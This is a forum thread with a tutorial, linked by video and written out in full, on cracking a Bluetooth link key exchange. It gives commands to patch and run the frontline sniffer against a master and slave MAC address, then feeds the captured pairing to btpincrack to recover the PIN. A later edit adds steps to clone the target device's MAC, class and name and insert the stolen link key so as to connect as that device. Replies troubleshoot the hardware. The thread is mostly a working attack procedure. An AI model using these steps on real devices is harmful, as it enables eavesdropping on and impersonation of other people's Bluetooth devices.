Nice one doc...maybe a write up would be good too
Video Tutorial: Using frontline comprobe to crack a link key exchange.
Hey guys
Been messing around with a few things and decided to make this little tutorial in the process.
Enjoy ;D
Blip.tv link
http://blip.tv/file/952892/
Youtube link
http://www.youtube.com/watch?v=r8QLAnmZZ2E
Nice one doc
dd if=/dev/swc666 of=/dev/wyze
Ok here's the write up on my video
Ok to setup this attack you will need the following...
one or two bluetooth enabled devices
frontline comprobe
A regular bluetooth device (for getting macs)
a copy of frontline.c
openciphers btpincrack Click to download
First thing is to setup your lab. Lets get the bluetooth hardware and services started.
You an check everything is running correctly by issuing the hciconfig command.Code:hciconfig hci0 up hciconfig hci1 up bash /etc/rc.d/rc.bluetooth start
Ok now we are ready to setup frontline.c.Code:hciconfig
Now I have had some trouble with the frontline source code and my frontline comprobe. I am using the airsniffer47-bc04 and it seems the packet shift is double than set in frontline.c ???
I'm keen to find out whats going on and have asked the powers that be to look into this and they have asked me to try a couple of things. One suggestion is to change FP_TYPE_SHIFT to 2 but it still has the same results. For now you will have to check it out for yourself, but if possible please could somebody try frontline.c with a dlink dbt120 without my mod and post the log ?
OK open frontline.c in your fav editor and find the following ...
Now change to the following values ...Code:#define TYPE_DV 8 #define LMP_IN_RAND 8 #define LMP_COMB_KEY 9 #define LMP_AU_RAND 11 #define LMP_SRES 12
Save and exit, then compile with the following command..Code:#define TYPE_DV 16 #define LMP_IN_RAND 16 #define LMP_COMB_KEY 18 #define LMP_AU_RAND 22 #define LMP_SRES 24
Thats frontline.c patched, now we can start the snifferCode:gcc -lbluetooth frontline.c -o frontline
ok if you run frontline with the -h tag you will see what options you have to play with. As explained in the video to start the sniffing process you will need the master's and slave's macs first. At the moment there is no way of telling who is the master or slave a piconet, obviously you would know this info because this is your equipment we are using right ??? ! lol But in a real situation it would just be trial and error and maybe a bit of a educated guess.
Ok lets scan for devices, if you already know the macs skip this step
Good practice to always issue a stop to your sniffer before starting just in case.Code:hcitool inq
Next we tell the comprobe to filter all frames.Code:frontline -d hci1 -s
Next we add our MAC'sCode:frontline -d hci1 -f 7
Now lets start the sniffing process. -p tell's frontline to look for a key exchange and -z tell frontline to ignore zero length packets or in my language crapCode:frontline -d hci1 -S MA:ST:ER:MA:C1@SL:AV:EM:AC:01
Now pair the two devices and you should see some data. Once the pairing process is complete, stop frontline and check back for the pairing process as seen in the video.Code:frontline -d hci1 -p -z -e
Next compile btpincrack I cant remember if you need to do anything to install onto bt3 so if you get errors post em and i'l fix em for you lol
And run frontlines output through btpincrack as seen in the video. A 6 digit pin should take around 7 seconds.
And you done
Nice tutorial Doc, Im still awaiting enough money to invest in a RAM bluetooth device with sma connection. You seriously love your bluetooth hacking, its really interesting. Cant wait until the day that I have the correct bluetooth adapter.
Out of interest, what adapters are you using? What firmware are you using for them?
Again, great tutorial. I like reading your work, gotta love that 'one to rule them all thread'
... EDIT: Wow, fast reply. I had this window opened whilst watching your vid. Looks like you already included the information I was talking about.
You're a good man Doc...
dd if=/dev/swc666 of=/dev/wyze
Thanks guys, I'm using a fujitsu-siemens bluetooth v2.0
EDIT:
If you would like to then use the link key to connect to the device, first you would clone the MAC of the desired device. Then you need to change your device class and name to the same as the desired device. Next you need to add your link key to bt. Go to /var/lib/bluetooth/LO:CA:LM:AC:AD [i](replace with your devices MAC) and open linkkeys and add the following.
*1 First channel availableCode:CL:ON:ED:MA:C linkkeydatalinkkaydatalinkkeydatalinkkeydata 0* 6*
*2 Last channel available
Save and you are good to go
Now i receive this error when trying to connect:
Cannot open '/dev/rfcomm0': No route to host
I'm assuming this is due to cloning everything and the phone is getting mixed up do to previous connection and i cant delete the bluetooth entry unless I restore to default setting which is not something i want to do and im also guessing this is the part you left?
akamagic, explain more ????
Ok let me go back a bit. First of all I'm having problems having frontline capture anything other than the unknown type:1 and type:4 caused by starting the devices. I followed everything in the writeup including patching frontline and also without. In the video you use hci dump, which clearly shows the process of my connection. So either frontline is my problem or its my dongle. I have a DBT-120 C1 running up raw and so almost positive it is in fact a sniffer
hci1: Type: USB
BD Address: 00:1C:F0:EE:AA
Sniff 47 (2006-02-15)
Chip version: BlueCore4-External
Max key size: 128 bit
SCO mapping: HCI
any suggestions would be appreciated
Hey akamagic
What are you trying to sniff ? I've also had problems like this when two devices change roles. Also distance is a big issue to, I would recommend you sniff only a foot away from the master.
If you still get stuck post what you are trying to achieve including the equipment used.
Posting Permissions